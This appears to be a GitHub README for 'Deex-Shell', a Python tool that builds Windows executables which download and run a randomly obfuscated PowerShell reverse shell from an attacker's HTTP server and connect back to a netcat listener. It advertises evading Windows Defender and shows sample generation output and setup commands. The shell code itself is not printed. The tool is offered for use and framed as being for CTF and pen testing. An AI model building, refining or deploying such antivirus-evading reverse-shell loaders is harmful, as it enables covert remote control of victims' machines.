10/03/2025 - Was getting blocked by Defender. Not anymore 🤡
Can get it here: https://github.com/deeexcee-io/Deex-Shell
## tldr;
Interactive Python Program that creates a Windows Executable which utilises an Obfuscated PowerShell One Liner to get a reverse shell.
Nothing fancy at all, just a randomly obfuscated Nishang PowerShell One-Liner that gets called by the `exe` and executed
## Update
12/03/2025 - Seems to be getting picked up on Win 11. Win 10 OK.
10/03/2025 - Was getting blocked by Defender. Not anymore 🤡
# C#/PowerShell Reverse Shell Executable
Currently Undetected (Defender) Executable Reverse Shell Windows PE.
The program generates a unique, obfuscated Powershell Reverse Shell One Liner each time.
The One Liner is then utilised in the executable which executes the obfuscated Powershell Reverse Shell when ran.
The C# code and PowerShell Script are dynamically generated each time so no 2 files should be the same, even with the same IP Address and Port.
```python
[+] Enter 1 to Create PE and start Listeners
[+] Enter 2 to simply create a PE
[+] Enter 3 to simply create a Obfuscated PowerShell Reverse Shell One Liner
<--Deex--># : 2
Enter IP address: 192.168.227.128
Enter port: 55555
[+] PE has been saved as CHIoWmocNR.exe and Remote PowerShell Reverse Shell Script has been saved as maDWQUYjzg in the current directory
Returning to Main Menu....
[+] Enter 1 to Create PE and start Listeners
[+] Enter 2 to simply create a PE
[+] Enter 3 to simply create a Obfuscated PowerShell Reverse Shell One Liner
<--Deex--># : 2
Enter IP address: 192.168.227.128
Enter port: 55555
[+] PE has been saved as jsUcXGaUhW.exe and Remote PowerShell Reverse Shell Script has been saved as KyKzkOlXyV in the current directory
Returning to Main Menu....
[+] Enter 1 to Create PE and start Listeners
[+] Enter 2 to simply create a PE
[+] Enter 3 to simply create a Obfuscated PowerShell Reverse Shell One Liner
┌──(kali㉿kali)-[/opt/Deex-Shell]
└─$ md5sum CHIoWmocNR.exe
894d03e8c5a9f2fb49a4f8fe8180e8bf CHIoWmocNR.exe
┌──(kali㉿kali)-[/opt/Deex-Shell]
└─$ md5sum jsUcXGaUhW.exe
2d07a03856acf334e878be35c079613e jsUcXGaUhW.exe
```
Perfect for CTF or Pen Testing purposes if Defender is running.
Any and all feedback is appreciated.
## Pre-requisites
It uses mono to compile the C# code in the python script into an executable so must be installed prior to running the script.
On Kali
```
sudo apt install mono-mcs
sudo apt install mono-devel
```
Then simply run
```
python3 deex-shell.py
```
## Option 1
Creates an Obfuscated and currently undetected (Defender) PowerShell Reverse Shell Script and PE. The program then launches a HTTP server to host the PowerShell Script which the executable grabs during execution. A netcat listener is then setup which catches the shell.
## Option 2
Outputs the PE and PowerShell Script to host to allow you to excute when needed.
## Option 3
Outputs the Obfuscated PowerShell Script only
## Deex-Shell in Action
![[277692075-81c69cf0-4906-4b7e-af1f-74f4bded7234.mp4]]

Currently undetectable but behavioural detections can class it as "malicious". What I mean by that is if the executable is transferred over and then executed immediatley, the fact it reaches out to a remote address and calls PowerShell is suspicious.

Made with assistance from chatgpt 🧠💻